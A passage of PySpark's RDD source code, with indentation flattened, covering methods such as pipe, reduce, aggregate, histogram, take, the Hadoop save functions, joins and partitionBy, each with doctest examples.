deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a :class:`StatCounter` object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the "org.apache.hadoop.io.Writable" types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is :class:`pyspark.serializers.PickleSerializer`, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
:param path: path to text file
:param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with `numPartitions` partitions, or
the default parallelism level if `numPartitions` is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
`self` and `other`.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in `self` and (k, v2) is in `other`.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of `self` and `other`.
For each element (k, w) in `other`, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Similarly, for each element (k, w) in `other`, the resulting RDD will
either contain all pairs (k, (v, w)) for v in `self`, or the pair
(k, (None, w)) if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (self._memory_limit() / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- `createCombiner`, which turns a V into a C (e.g., creates
a one-element list)
- `mergeValue`, to merge a V into a C (e.g., adds it to the end of
a list)
